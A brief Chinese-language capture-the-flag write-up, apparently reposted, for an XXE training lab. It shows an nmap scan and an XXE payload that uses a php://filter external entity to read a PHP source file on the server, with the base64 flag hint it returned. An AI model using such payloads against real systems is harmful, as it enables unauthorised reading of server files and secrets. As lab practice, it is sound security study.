思路

題目已經提示是XXE的專項練習，所以，直接找XXE問題.

難度

入門

端口掃描

nmap -sS -A 10.129.10.64

發現HTTP服務、Apache 2.4.27中間件、robots.txt泄漏了目錄和文件

80端口檢查

其中，/xxe/index.php頁面通過xml格式提交用戶名和密碼，于是，此處即為XXE所在位置。
構造如下payload，讀取頁面源碼，獲得一不知是flag還是flag Hint的內容：

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]> <root><name>&admin;</name><password>123</password></root>

響應：

<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->

于是，陷入蒙蔽。。。。等待作者反饋中

轉載于:https://blog.51cto.com/executer/2314187

總結

以上是生活随笔為你收集整理的XXE Lab：1题解的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。